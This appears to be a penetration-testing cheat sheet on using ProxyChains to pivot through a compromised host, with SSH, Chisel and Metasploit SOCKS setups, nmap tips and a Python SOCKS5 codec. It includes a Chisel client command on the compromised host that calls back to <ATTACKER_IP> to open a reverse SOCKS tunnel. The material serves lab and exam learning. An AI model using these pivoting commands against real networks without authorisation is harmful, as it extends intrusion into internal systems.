# Proxychains

### Overview

ProxyChains is commonly used during internal assessments and exams to **route traffic through a compromised host** in order to reach otherwise inaccessible networks or services.

### Setup

1. First, create a SOCKS proxy from the compromised host back to your machine. This can be done via:
   * SSH dynamic port forwarding (Needs SSH access)

     ```bash
     ssh -f -N -D 1080 user@compromised_host
     ```
   * Chisel (Does not need SSH access) (SOCKS proxy exposed on **127.0.0.1:1080** by default)

     ```bash
     # Run the server on attacking machine
     chisel server --reverse --port 9001
     # Run client on the compromised host
     chisel client <ATTACKER_IP>:9001 R:socks
     ```
   * Metasploit SOCKS module (Use when you already have a Meterpreter session)

     ```bash
     # In msfconsole
     use auxiliary/server/socks_proxy
     set SRVPORT 1080
     set VERSION 5
     run
     # Route traffic for the target subnet through the session
     route add <TARGET_SUBNET> <NETMASK> <SESSION_ID>
     ```
2. Edit the ProxyChains configuration file and add your SOCKS proxy at the bottom of the file.

   ```bash
   socks5 127.0.0.1 1080
   ```
3. Validate the pivot, for example with `proxychains curl` against an internal service (a plain `ping` through the proxy will not work, since ICMP is not carried over SOCKS).
4. Prefix commands with `proxychains` to run them through the proxy.

### Useful information

* Comment out `proxy_dns` in the proxychains configuration to ensure nmap does not hang.
* You can only use TCP scans, so no UDP or SYN scans. ICMP Echo packets (ping requests) will also not work through the proxy, so use the `-Pn` switch to stop Nmap from attempting host discovery.
* Must use `-sT` (connect scan), as SYN scans (`-sS`) use raw sockets and bypass proxychains.
* Choose the chain type: `dynamic_chain` (skips dead proxies) vs `strict_chain` (the default; every proxy in the chain must be up).
* Scans will be *extremely* slow. Try to only use Nmap through a proxy when using the NSE (i.e. use a static binary to see where the open ports/hosts are before proxying a local copy of nmap to use the script library).
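The caveats above (TCP connect only, `-Pn`, `proxy_dns`) all follow from what proxychains actually sends to the `socks5 127.0.0.1 1080` entry. The following SOCKS5 (RFC 1928) message codec is an added illustration, not code from the original checklist; the target names and reply bytes are constructed samples:

```python
import ipaddress
import struct

# Added illustration: the SOCKS5 (RFC 1928) CONNECT exchange that proxychains
# performs against the `socks5 127.0.0.1 1080` entry. Only stream (TCP)
# connections are relayed this way, which is why -sT works but -sS/UDP/ICMP
# never reach the pivot. Target names/addresses below are constructed samples.
SOCKS_VERSION = 5
CMD_CONNECT = 0x01                # proxychains only needs CONNECT (no UDP ASSOCIATE)
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
NO_AUTH = 0x00
REPLY_TEXT = {0x00: "succeeded", 0x01: "general failure", 0x02: "not allowed",
              0x03: "network unreachable", 0x04: "host unreachable",
              0x05: "connection refused", 0x06: "TTL expired",
              0x07: "command not supported", 0x08: "address type not supported"}

def build_greeting() -> bytes:
    # VER | NMETHODS | METHODS: offer "no authentication" only
    return bytes([SOCKS_VERSION, 1, NO_AUTH])

def build_connect(target: str, port: int, proxy_dns: bool = False) -> bytes:
    """Encode a CONNECT request. With proxy_dns the hostname travels as ATYP 0x03
    and is resolved on the proxy side; otherwise target must already be an IPv4
    (proxychains resolves it locally, where internal names will not resolve)."""
    header = bytes([SOCKS_VERSION, CMD_CONNECT, 0x00])      # VER, CMD, RSV
    try:
        addr = bytes([ATYP_IPV4]) + ipaddress.IPv4Address(target).packed
    except ipaddress.AddressValueError:
        if not proxy_dns:
            raise ValueError("hostname given but proxy_dns is off: resolve locally first")
        name = target.encode()
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return header + addr + struct.pack("!H", port)

def parse_reply(data: bytes):
    """Decode the proxy's reply: (ok, description, bound_addr, bound_port)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        bnd, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        bnd, rest = data[5:5 + n].decode(), data[5 + n:]
    else:
        raise ValueError("unsupported address type %#x" % atyp)
    port = struct.unpack("!H", rest[:2])[0]
    return rep == 0x00, REPLY_TEXT.get(rep, "unknown"), bnd, port
```

A reply code other than `0x00` (for example `0x05`, connection refused) is what you see as a failed `proxychains curl`, while a raw-socket or ICMP probe never produces a request at all.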
